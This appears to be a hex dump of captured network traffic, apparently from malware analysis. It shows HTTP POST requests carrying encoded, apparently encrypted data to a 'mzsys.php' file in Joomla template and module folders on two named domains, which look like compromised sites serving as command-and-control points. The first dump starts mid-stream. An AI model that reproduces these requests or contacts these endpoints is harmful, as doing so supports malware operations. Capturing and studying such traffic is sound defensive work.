0x000001d0 (00464)   35443445 42393437 30424331 31353937   5D4EB9470BC11597
0x000001e0 (00480)   44333536 34354546 41423346 32304641   D35645EFAB3F20FA
0x000001f0 (00496)   39434541 43433141 44434236 45413244   9CEACC1ADCB6EA2D
0x00000200 (00512)   37443641 43443935 32303841 38443243   7D6ACD95208A8D2C
0x00000210 (00528)   44323431 38393231 38323631 31394544   D2418921826119ED
0x00000220 (00544)   30464546 34354142 30414339 33303343   0FEF45AB0AC9303C
0x00000230 (00560)   36313737 36373632 35363141 36303245   61776762561A602E
0x00000240 (00576)   31363243 38364532 41344536 41353646   162C86E2A4E6A56F
0x00000250 (00592)   33424145 35384342 42414231 46413230   3BAE58CBBAB1FA20
0x00000260 (00608)   30393844 30393736 38413235 38464332   098D09768A258FC2
0x00000270 (00624)   37434633 44463845 46343436 31373341   7CF3DF8EF446173A
0x00000280 (00640)   43413739 34374433 37423739 41334134   CA7947D37B79A3A4
0x00000290 (00656)   36443937 38323242 39363639 34393733   6D97822B96694973
0x000002a0 (00672)   46364241 41413345 39313434 31324636   F6BAAA3E914412F6
0x000002b0 (00688)   38453336 38373033 38383236 38463944   8E36870388268F9D
0x000002c0 (00704)   36363544 31374239 30304244 41323346   665D17B900BDA23F
0x000002d0 (00720)   42453933 46333139 37353138 38304245   BE93F319751880BE
0x000002e0 (00736)   42364134 39464241 32433144 31433341   B6A49FBA2C1D1C3A
0x000002f0 (00752)   30393632 42344532 42423236 38324537   0962B4E2BB2682E7
0x00000300 (00768)   38334235 35303239 33364139 45423036   83B5502936A9EB06
0x00000310 (00784)   35314136 43343131 30463439 32433045   51A6C4110F492C0E
0x00000320 (00800)   33413545 42453137 39353243 45363437   3A5EBE17952CE647
0x00000330 (00816)   32393631 35454643 37394431 35344343   29615EFC79D154CC
0x00000340 (00832)   45363534 46423335 35413335 37344442   E654FB355A3574DB
0x00000350 (00848)   41374634 35423644 35463433 39383744   A7F45B6D5F43987D
0x00000360 (00864)   39423432 34453537 44393241 30303636   9B424E57D92A0066
0x00000370 (00880)   41443543 34383732 37383743 39423130   AD5C4872787C9B10
0x00000380 (00896)   43373935 33373734 41323137 30443132   C7953774A2170D12
0x00000390 (00912)   42363343 42334541 36383541 45323744   B63CB3EA685AE27D
0x000003a0 (00928)   32333144 43394531 44414134 41304432   231DC9E1DAA4A0D2
0x000003b0 (00944)   33314443 39453144 41413441 30413441   31DC9E1DAA4A0A4A
0x000003c0 (00960)   302d6a01                              0-j.

0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   736a5f69 63656e74 65722f68 746d6c2f   sj_icenter/html/
0x00000020 (00032)   6d6f645f 6b325f63 6f6e7465 6e742f44   mod_k2_content/D
0x00000030 (00048)   65666175 6c742f6d 7a737973 2e706870   efault/mzsys.php
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a2037 2c202c20 2c202c20 2c202c20   t: 7, , , , , , 
0x00000060 (00096)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000070 (00112)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000080 (00128)   2c200d0a 436f6e74 656e742d 54797065   , ..Content-Type
0x00000090 (00144)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x000000a0 (00160)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x000000b0 (00176)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x000000c0 (00192)   204d6f7a 696c6c61 2f352e30 20285769    Mozilla/5.0 (Wi
0x000000d0 (00208)   6e646f77 73204e54 20362e33 3b20574f   ndows NT 6.3; WO
0x000000e0 (00224)   5736343b 20547269 64656e74 2f372e30   W64; Trident/7.0
0x000000f0 (00240)   3b20546f 7563683b 2072763a 31312e30   ; Touch; rv:11.0
0x00000100 (00256)   29206c69 6b652047 65636b6f 0d0a486f   ) like Gecko..Ho
0x00000110 (00272)   73743a20 70617373 6c696674 2e636f6d   st: passlift.com
0x00000120 (00288)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000130 (00304)   3a203634 350d0a43 61636865 2d436f6e   : 645..Cache-Con
0x00000140 (00320)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000150 (00336)   0d0a6461 74613d30 39343338 35303545   ..data=09438505E
0x00000160 (00352)   44353542 38463331 41413938 39393545   D55B8F31AA98995E
0x00000170 (00368)   38303433 39344439 36354443 38463341   804394D965DC8F3A
0x00000180 (00384)   45383731 38463031 42304343 37384639   E8718F01B0CC78F9
0x00000190 (00400)   45423232 46423541 33324139 39323235   EB22FB5A32A99225
0x000001a0 (00416)   44453933 43374339 44423141 36324339   DE93C7C9DB1A62C9
0x000001b0 (00432)   36464135 45313545 30443545 43433631   6FA5E15E0D5ECC61
0x000001c0 (00448)   46344636 31393135 30433334 31423732   F4F619150C341B72
0x000001d0 (00464)   31354535 31373145 37324143 32353835   15E5171E72AC2585
0x000001e0 (00480)   33463134 30353336 35414536 43394336   3F1405365AE6C9C6
0x000001f0 (00496)   34363542 38424334 31354434 45423934   465B8BC415D4EB94
0x00000200 (00512)   37304243 31313539 37443335 36343545   70BC11597D35645E
0x00000210 (00528)   46414233 46323046 41394345 41434331   FAB3F20FA9CEACC1
0x00000220 (00544)   41444342 36454132 44374436 41434439   ADCB6EA2D7D6ACD9
0x00000230 (00560)   35323038 41384432 43443234 31383932   5208A8D2CD241892
0x00000240 (00576)   31383236 31313945 44304645 46343541   1826119ED0FEF45A
0x00000250 (00592)   42304143 39333033 43363137 37363736   B0AC9303C6177676
0x00000260 (00608)   32353631 41363032 45313632 43383645   2561A602E162C86E
0x00000270 (00624)   32413445 36413536 46334241 45353843   2A4E6A56F3BAE58C
0x00000280 (00640)   42424142 31464132 30303938 44303937   BBAB1FA20098D097
0x00000290 (00656)   36384132 35384643 32374346 33444638   68A258FC27CF3DF8
0x000002a0 (00672)   45463434 36313733 41434137 39343744   EF446173ACA7947D
0x000002b0 (00688)   33374237 39413341 34364439 37383232   37B79A3A46D97822
0x000002c0 (00704)   42393636 39343937 33463642 41414133   B96694973F6BAAA3
0x000002d0 (00720)   45393134 34313246 36384533 36383730   E914412F68E36870
0x000002e0 (00736)   33383832 36384639 44363635 44313742   388268F9D665D17B
0x000002f0 (00752)   39303042 44413233 46424539 33463331   900BDA23FBE93F31
0x00000300 (00768)   39373531 38383042 45423641 34394642   9751880BEB6A49FB
0x00000310 (00784)   41324331 44314333 41303936 32423445   A2C1D1C3A0962B4E
0x00000320 (00800)   32424232 36383245 37383342 35353032   2BB2682E783B5502
0x00000330 (00816)   39333641 39454230 36353141 36433431   936A9EB0651A6C41
0x00000340 (00832)   31304634 39324330 45334135 45424531   10F492C0E3A5EBE1
0x00000350 (00848)   37393532 43453634 37323936 31354546   7952CE64729615EF
0x00000360 (00864)   43373944 31353443 43453635 34464233   C79D154CCE654FB3
0x00000370 (00880)   35354133 35373444 42413746 34354236   55A3574DBA7F45B6
0x00000380 (00896)   44354634 33393837 44394234 32344535   D5F43987D9B424E5
0x00000390 (00912)   37443932 41303036 36414435 43343837   7D92A0066AD5C487
0x000003a0 (00928)   32373837 43394231 30433739 35333737   2787C9B10C795377
0x000003b0 (00944)   34413231 37304431 32423633 43423345   4A2170D12B63CB3E
0x000003c0 (00960)   41363835 41453237 44323331 44433945   A685AE27D231DC9E
0x000003d0 (00976)   31444141 344130                       1DAA4A0

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f7370 65656475 702f6d7a 7379732e   d_speedup/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a20372c 202c202c 202c202c   cept: 7, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a2061 6374696f 6e706f75   .Host: actionpou
0x00000100 (00256)   72697372 61656c2e 636f6d0d 0a436f6e   risrael.com..Con
0x00000110 (00272)   74656e74 2d4c656e 6774683a 20363435   tent-Length: 645
0x00000120 (00288)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000130 (00304)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x00000140 (00320)   613d3039 34333835 30354544 35354238   a=09438505ED55B8
0x00000150 (00336)   46333141 41393839 39354538 30343339   F31AA98995E80439
0x00000160 (00352)   34443936 35444338 46334145 38373138   4D965DC8F3AE8718
0x00000170 (00368)   46303142 30434337 38463945 42323246   F01B0CC78F9EB22F
0x00000180 (00384)   42354133 32413939 32323544 45393343   B5A32A99225DE93C
0x00000190 (00400)   37433944 42314136 32433936 46413545   7C9DB1A62C96FA5E
0x000001a0 (00416)   31354530 44354543 43363146 34463631   15E0D5ECC61F4F61
0x000001b0 (00432)   39313530 43333431 42373231 35453531   9150C341B7215E51
0x000001c0 (00448)   37314537 32414332 35383533 46313430   71E72AC25853F140
0x000001d0 (00464)   35333635 41453643 39433634 36354238   5365AE6C9C6465B8
0x000001e0 (00480)   42433431 35443445 42393437 30424331   BC415D4EB9470BC1
0x000001f0 (00496)   31353937 44333536 34354546 41423346   1597D35645EFAB3F
0x00000200 (00512)   32304641 39434541 43433141 44434236   20FA9CEACC1ADCB6
0x00000210 (00528)   45413244 37443641 43443935 32303841   EA2D7D6ACD95208A
0x00000220 (00544)   38443243 44323431 38393231 38323631   8D2CD24189218261
0x00000230 (00560)   31394544 30464546 34354142 30414339   19ED0FEF45AB0AC9
0x00000240 (00576)   33303343 36313737 36373632 35363141   303C61776762561A
0x00000250 (00592)   36303245 31363243 38364532 41344536   602E162C86E2A4E6
0x00000260 (00608)   41353646 33424145 35384342 42414231   A56F3BAE58CBBAB1
0x00000270 (00624)   46413230 30393844 30393736 38413235   FA20098D09768A25
0x00000280 (00640)   38464332 37434633 44463845 46343436   8FC27CF3DF8EF446
0x00000290 (00656)   31373341 43413739 34374433 37423739   173ACA7947D37B79
0x000002a0 (00672)   41334134 36443937 38323242 39363639   A3A46D97822B9669
0x000002b0 (00688)   34393733 46364241 41413345 39313434   4973F6BAAA3E9144
0x000002c0 (00704)   31324636 38453336 38373033 38383236   12F68E3687038826
0x000002d0 (00720)   38463944 36363544 31374239 30304244   8F9D665D17B900BD
0x000002e0 (00736)   41323346 42453933 46333139 37353138   A23FBE93F3197518
0x000002f0 (00752)   38304245 42364134 39464241 32433144   80BEB6A49FBA2C1D
0x00000300 (00768)   31433341 30393632 42344532 42423236   1C3A0962B4E2BB26
0x00000310 (00784)   38324537 38334235 35303239 33364139   82E783B5502936A9
0x00000320 (00800)   45423036 35314136 43343131 30463439   EB0651A6C4110F49
0x00000330 (00816)   32433045 33413545 42453137 39353243   2C0E3A5EBE17952C
0x00000340 (00832)   45363437 32393631 35454643 37394431   E64729615EFC79D1
0x00000350 (00848)   35344343 45363534 46423335 35413335   54CCE654FB355A35
0x00000360 (00864)   37344442 41374634 35423644 35463433   74DBA7F45B6D5F43
0x00000370 (00880)   39383744 39423432 34453537 44393241   987D9B424E57D92A
0x00000380 (00896)   30303636 41443543 34383732 37383743   0066AD5C4872787C
0x00000390 (00912)   39423130 43373935 33373734 41323137   9B10C7953774A217
0x000003a0 (00928)   30443132 42363343 42334541 36383541   0D12B63CB3EA685A
0x000003b0 (00944)   45323744 32333144 43394531 44414134   E27D231DC9E1DAA4
0x000003c0 (00960)   41303835 41453237 44323331 44433945   A085AE27D231DC9E
0x000003d0 (00976)   31444141 344130                       1DAA4A0


Strings